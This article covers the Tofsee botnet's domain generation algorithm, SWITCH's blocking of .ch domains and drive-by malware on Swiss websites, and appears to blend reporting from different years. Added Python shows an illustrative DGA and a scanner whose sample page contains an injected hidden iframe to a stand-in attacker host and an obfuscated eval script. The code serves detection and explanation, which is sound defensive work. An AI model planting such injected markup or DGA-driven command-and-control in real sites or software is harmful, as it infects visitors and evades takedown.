Internet viruses lurk not only on porn sites but in places you might never expect. The spam botnet Tofsee uses a domain generation algorithm (DGA): instead of relying on a fixed list of servers, it produces a fresh set of about 50 domain names each day for the bots to contact.

To make surfing safer, the Swiss Government's Computer Emergency Response Team (GovCERT) contacted the SWITCH Foundation, the organization that runs the .ch and .li registries. SWITCH obtained a Tofsee sample. Among the hundreds of samples it examines while monitoring the Swiss web for malicious code, this one stood out: about half of the domains produced by the sample were under Switzerland's top-level domain, .ch, and the other half under .biz. All of these names were algorithmically generated for use by the Tofsee botnet. SWITCH analyzed the malware and its domain generation algorithm (DGA).

SWITCH used its existing process to temporarily block the domains. SWITCH explained in a post: “This week the Swiss Governmental Computer Emergency Response Team (GovCERT) informed us about the malware Tofsee using .ch as one of the TLDs in its DGA. Together with GovCERT and RoLR (Registry of Last Resort) we used our planned process and added around 520 names to a list of .ch domain names that cannot be registered while they are actively used by the malware.”
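What makes this kind of pre-registration blocking possible is that a DGA is a deterministic function of the date: the same function that hands a bot its names for the day hands the registry the list of names to reserve, and hands a resolver operator a check for queried names. The Python sketch below is an added illustration of that mechanism, not Tofsee's actual algorithm and not SWITCH's code. The seed, the SHA-256 construction, the label lengths, the .ch/.biz alternation, the example date and the 21-day window are all assumptions chosen for the example.

```python
import hashlib
from datetime import date, timedelta
from typing import List, Set

# Assumptions (NOT Tofsee's real algorithm): SHA-256 over a fixed seed, the
# date and a counter drives a per-day list of 50 names that alternates
# between the .ch and .biz TLDs, matching the half/half split described above.
SEED = b"illustrative-dga-seed"
TLDS = (".ch", ".biz")
PER_DAY = 50
EXAMPLE_START = date(2017, 1, 10)   # constructed date, not from the post


def dga_for_day(day: date, per_day: int = PER_DAY) -> List[str]:
    """Return the domains a bot would try on `day`.

    Deterministic: every bot, and every defender who has recovered the
    seed and the construction, gets the same list for the same date.
    """
    names = []
    for i in range(per_day):
        digest = hashlib.sha256(SEED + day.isoformat().encode() + bytes([i])).digest()
        length = 8 + digest[0] % 5                      # label of 8..12 letters
        label = "".join(chr(ord("a") + b % 26) for b in digest[1:1 + length])
        names.append(label + TLDS[i % len(TLDS)])
    return names


def names_to_reserve(start: date, days: int, tld: str = ".ch") -> Set[str]:
    """Registry view: every name under `tld` the DGA will use from `start`
    for `days` days. These are the names a registry can put on a
    cannot-be-registered list before the bots ever ask for them."""
    reserved = set()
    for offset in range(days):
        for name in dga_for_day(start + timedelta(days=offset)):
            if name.endswith(tld):
                reserved.add(name)
    return reserved


def is_dga_name(domain: str, today: date, slack_days: int = 1) -> bool:
    """Resolver/SOC view: is `domain` one the DGA produces today or within
    `slack_days` of today (bots with skewed clocks)?"""
    window = names_to_reserve(today - timedelta(days=slack_days),
                              2 * slack_days + 1, tld="")
    return domain.lower() in window


if __name__ == "__main__":
    today = dga_for_day(EXAMPLE_START)
    print(f"{len(today)} names for {EXAMPLE_START}, e.g. {today[:4]}")
    block = names_to_reserve(EXAMPLE_START, 21)
    print(f"{len(block)} .ch names to reserve over 21 days")
    print(is_dga_name(today[0], EXAMPLE_START), is_dga_name("switch.ch", EXAMPLE_START))
```

With 25 .ch names a day, a 21-day window gives 525 names, the same order of magnitude as the roughly 520 in the post; the real list depends on the real algorithm, which the post does not give. Two practical points the sketch makes visible: a registry only needs to care about the names under its own TLD, so the .biz half has to be handled by a different registry, and a resolver-side check should allow a day of slack either way because infected machines do not all agree on the date.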

The botnet and its algorithm were described in detail in a blog post yesterday by Michael Hausding, an IT expert who belongs to the Computer Emergency Response Team (CERT) at SWITCH.

“Error: the webpage cannot be displayed.” Messages like this are common when surfing the web. You check that the address has been typed correctly and try again, but the page still does not come up. Annoying, but sometimes it is for the better. There are many reasons why a site may be inaccessible: the server is down, an update is in progress, or there is a connection problem. For the sake of IT security, however, the site may also have been blocked deliberately.

“Some sites have malicious code hidden in them that can infect a computer. The consequences can be serious: personal data and passwords may be stolen, or the whole system may crash,” said Michael Hausding. “My job is to block infected sites and prevent the spread of malware and other harmful code.” Although invisible to the Internet user, the CERT at SWITCH is working successfully against malware in Switzerland.

How malware works on your computer

Methods for distributing malware are legion. “Spreading it through ‘drive-by downloads’ has increased recently. Exploiting a gap in the content management software, hidden code is placed on the website without changing its look or feel. When users visit the infected page, the code can install viruses and Trojan horses on their computers. There are actually companies which will create scripts to spread harmful code all over the web for 500 dollars,” Michael Hausding explained.
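The injection Hausding describes is invisible in the browser but usually leaves a trace in the page source that a site owner or a CERT can look for: an iframe with zero size or a hidden style pointing at a third-party host, or a script that decodes itself at runtime. The scanner below is an added example, not SWITCH's tooling, run over a constructed sample page (the club name, the attacker host and the encoded payload are invented). The patterns are a starting heuristic for a quick triage, not a complete detection.

```python
import re
from html.parser import HTMLParser
from typing import Dict, List

# Constructed sample page, not taken from any real site: a normal-looking
# club homepage with an injected zero-size iframe and an obfuscated script.
SAMPLE_PAGE = """<html><head><title>FC Musterstadt</title>
<script src="/js/jquery.js"></script>
</head><body>
<h1>Welcome to FC Musterstadt</h1>
<p>Next match on Saturday.</p>
<iframe src="http://attacker.invalid/in.php" width="0" height="0" style="visibility:hidden"></iframe>
<script>eval(unescape("%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%29"));</script>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
</body></html>"""

# Styles that hide an element from the visitor without removing it.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

# Script bodies that decode themselves at runtime, a common shape for
# injected droppers. Heuristics, not signatures.
SUSPICIOUS_JS = [
    re.compile(r"eval\s*\(\s*unescape\s*\(", re.I),
    re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I),
    re.compile(r"(?:%[0-9a-f]{2}){20,}", re.I),      # long %xx-encoded run
    re.compile(r"(?:\\x[0-9a-f]{2}){20,}", re.I),    # long \xNN-encoded run
]


class InjectionScanner(HTMLParser):
    """Collects iframes that are hidden or zero-sized and script blocks
    that match the self-decoding patterns above."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[Dict[str, str]] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            zero = (a.get("width", "").strip() in ("0", "0px")
                    or a.get("height", "").strip() in ("0", "0px"))
            hidden = bool(HIDDEN_STYLE.search(a.get("style", "")))
            if zero or hidden:
                self.findings.append({"type": "hidden_iframe", "detail": a.get("src", "")})
        elif tag == "script":
            self._in_script = True

    def handle_data(self, data):
        # HTMLParser hands over the raw <script> body as one data chunk.
        if self._in_script:
            for pat in SUSPICIOUS_JS:
                if pat.search(data):
                    self.findings.append({"type": "obfuscated_script", "detail": pat.pattern})
                    break

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def scan_html(html: str) -> List[Dict[str, str]]:
    """Return a list of findings for one page's HTML source."""
    scanner = InjectionScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE):
        print(f"{finding['type']}: {finding['detail']}")
```

Run it against the HTML as fetched from the server rather than as rendered in a browser, since the injected code may rewrite the DOM once it executes; for the same reason, fetching with a non-browser user agent can return a different (clean) page from a server that is serving the injection selectively, so compare both.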

The last time I remember that we had to take action against malware using .ch or .li domain names was about 8 years ago. It was Conficker, which infected millions of computers worldwide. The malware was generating about 500 .ch and .li domains a day to be potentially used as a command and control server. SWITCH then joined the Conficker Working Group to prevent the use of domain names by this malware.

“Apart from our work, there are the actions of the major Internet service providers, who inform their customers periodically about the current threats.”

“Last year there were a number of DDoS (Distributed Denial of Service) attacks on the Swiss Federal Railways and Post-Finance. When this happens, the web site or server is knocked out by bombarding it with requests.”

Where malware is found

Contrary to common belief, porn sites or sites offering pirated music, films, programs and so on are not necessarily the most dangerous, according to Michael Hausding. “Malicious code can just as easily be found on the web sites of voluntary associations, sports clubs and small businesses. The site was just using out-of-date software or unsecured passwords.” The owners of these domain names, he emphasized, are not criminals. “They are the unwilling helpers of whoever is controlling the botnet. But then it's our job to step in” and get them to clean up their act.

How suspect sites are identified

Specialized firms and some individuals identify these suspect sites and tell SWITCH about them. “On average we get fifty of these notifications a week.” Once they have confirmed that the pages can really infect a computer, the CERT experts inform the owner or administrator of the domain. “It's up to them to remove the malicious code from the site. For technical staff, this is a fairly straightforward operation that can be done quickly.” If there is no response within 24 hours, SWITCH takes down the whole domain; the web site is no longer accessible. “If there is no reaction even to this, we ask the owner to identify him or herself with proof of residence or proof of company registration, as the case may be. If no such identification is forthcoming, the domain name itself is scrapped.”

Between February 2011 and July 2012, CERT cleaned up 2,828 Swiss sites. “The owners of domain names usually get back to us in a hurry. Often enough, having a web site down means losing money,” Hausding said.

Switzerland's approach to fighting malware is unique in the world, according to Hausding. “Switzerland is the only country in which there is a clear legal framework.”


32% of computers in the world are infected by malware (viruses, worms and Trojan horses), according to Panda Security's latest report (April-June 2012).

Switzerland is the country with the fewest infected computers (18.4%). The countries hardest hit are South Korea (57.3%), China (51.9%) and Taiwan (42.9%).